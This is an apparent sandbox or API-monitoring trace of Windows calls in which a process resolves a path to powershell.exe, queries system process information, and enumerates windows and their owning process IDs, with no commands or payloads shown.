	[0130.938] GetModuleFileNameExW (in: hProcess=0x300, hModule=0x13f600000, lpFilename=0x2e3190, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0130.939] CoTaskMemFree (pv=0x2e3190) 
	[0130.940] CloseHandle (hObject=0x300) returned 1
	[0130.949] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x120) returned 0x300
	[0130.951] GetExitCodeProcess (in: hProcess=0x300, lpExitCode=0x1cdc58 | out: lpExitCode=0x1cdc58*=0x103) returned 1
	[0130.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12beb088, Length=0x20000, ResultLength=0x1cdc20 | out: SystemInformation=0x12beb088, ResultLength=0x1cdc20*=0x13c20) returned 0x0
	[0131.073] EnumWindows (lpEnumFunc=0x28d66ac, lParam=0x0) returned 1
	[0131.121] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.121] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.121] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.121] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.121] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.122] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.122] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.122] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.122] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.122] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x538
	[0131.122] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.122] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.122] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.123] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x514
	[0131.123] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.123] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x778
	[0131.123] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x778
	[0131.123] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.123] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x458
	[0131.124] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.124] GetWindowThreadProcessId (in: hWnd=0xa0266, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0xa18
	[0131.124] GetWindowThreadProcessId (in: hWnd=0x14017c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x978
	[0131.124] GetWindowThreadProcessId (in: hWnd=0x5026a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x838
	[0131.124] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0xb2c
	[0131.124] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8d4
	[0131.125] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x874
	[0131.125] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9a8
	[0131.125] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0xb40
	[0131.125] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0xa00
	[0131.125] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.125] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.125] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.126] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.126] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.126] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.126] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.126] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.126] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9f0
	[0131.126] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9e0
	[0131.126] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9d0
	[0131.127] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9c0
	[0131.127] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9b0
	[0131.127] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9a0
	[0131.127] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x990
	[0131.127] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x980
	[0131.127] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x970
	[0131.127] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x960
	[0131.127] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x950
	[0131.127] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x940
	[0131.128] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x930
	[0131.128] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x920
	[0131.128] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x910
	[0131.128] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x900
	[0131.128] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8f0
	[0131.128] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8e0
	[0131.128] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8d0
	[0131.128] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8c0
	[0131.128] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8b0
	[0131.129] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8a0
	[0131.129] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x890
	[0131.129] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x880
	[0131.129] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x870
	[0131.129] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x860
	[0131.129] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x850
	[0131.129] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x840
	[0131.129] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x830
	[0131.130] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x820
	[0131.130] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x810
	[0131.130] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x20c
	[0131.130] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7c4
	[0131.130] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0xc0
	[0131.130] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x688
	[0131.130] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x6c0
	[0131.130] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x408
	[0131.131] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7d4
	[0131.131] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x544
	[0131.131] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x540
	[0131.131] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x71c
	[0131.131] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x31c
	[0131.131] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7ec
	[0131.131] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x5b8
	[0131.131] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x754
	[0131.131] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x664
	[0131.132] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x640
	[0131.132] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x700
	[0131.132] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x410
	[0131.132] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7a0
	[0131.132] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x3b4
	[0131.132] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x5cc
	[0131.132] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x5d4
	[0131.133] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7c0
	[0131.133] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x364
	[0131.133] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x240
	[0131.133] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x560
	[0131.133] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x57c
	[0131.133] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7b0
	[0131.133] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x6a4
	[0131.133] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x32c
	[0131.134] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x670
	[0131.134] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4f0
	[0131.134] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x514
	[0131.134] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x50c
	[0131.134] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x514
	[0131.134] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x50c
	[0131.134] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x514
	[0131.134] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4f0
	[0131.135] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4f0
	[0131.135] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x58c
	[0131.135] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x578
	[0131.135] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x458
	[0131.135] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x530
	[0131.135] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.135] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x508
	[0131.135] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.136] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4f4
	[0131.136] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.136] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.136] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x794
	[0131.136] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.136] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.136] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x458
	[0131.137] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x458
	[0131.137] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x448
	[0131.137] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x778
	[0131.137] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x458
	[0131.137] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x538
	[0131.137] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.137] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4ac
	[0131.137] GetWindowThreadProcessId (in: hWnd=0x30292, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x938
	[0131.138] GetWindowThreadProcessId (in: hWnd=0x30294, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7c8
	[0131.138] GetWindowThreadProcessId (in: hWnd=0x3028a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0xbdc
	[0131.138] GetWindowThreadProcessId (in: hWnd=0x5026c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0xbe0
	[0131.138] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9f4
	[0131.138] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x964
	[0131.138] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9e8
	[0131.138] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9e8
	[0131.138] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0xb40
	[0131.139] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0xa00
	[0131.139] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9f0
	[0131.139] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9e0
	[0131.139] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9d0
	[0131.139] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9c0
	[0131.139] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9b0
	[0131.139] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x9a0
	[0131.139] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x990
	[0131.140] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x980
	[0131.140] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x970
	[0131.140] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x960
	[0131.140] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x950
	[0131.140] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x940
	[0131.140] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x930
	[0131.140] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x920
	[0131.140] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x910
	[0131.141] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x900
	[0131.141] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8f0
	[0131.141] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8e0
	[0131.141] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8d0
	[0131.141] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8c0
	[0131.141] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8b0
	[0131.141] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x8a0
	[0131.142] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x890
	[0131.142] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x880
	[0131.142] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x870
	[0131.142] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x860
	[0131.142] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x850
	[0131.142] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x840
	[0131.142] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x830
	[0131.142] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x820
	[0131.142] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x810
	[0131.143] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x20c
	[0131.143] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7c4
	[0131.143] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0xc0
	[0131.143] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x688
	[0131.143] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x6c0
	[0131.143] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x408
	[0131.143] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7d4
	[0131.143] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x544
	[0131.143] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x540
	[0131.144] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x71c
	[0131.144] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x31c
	[0131.144] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7ec
	[0131.144] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x5b8
	[0131.144] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x754
	[0131.144] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x664
	[0131.144] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x640
	[0131.144] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x700
	[0131.145] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x410
	[0131.145] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7a0
	[0131.145] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x3b4
	[0131.145] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x5cc
	[0131.145] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x5d4
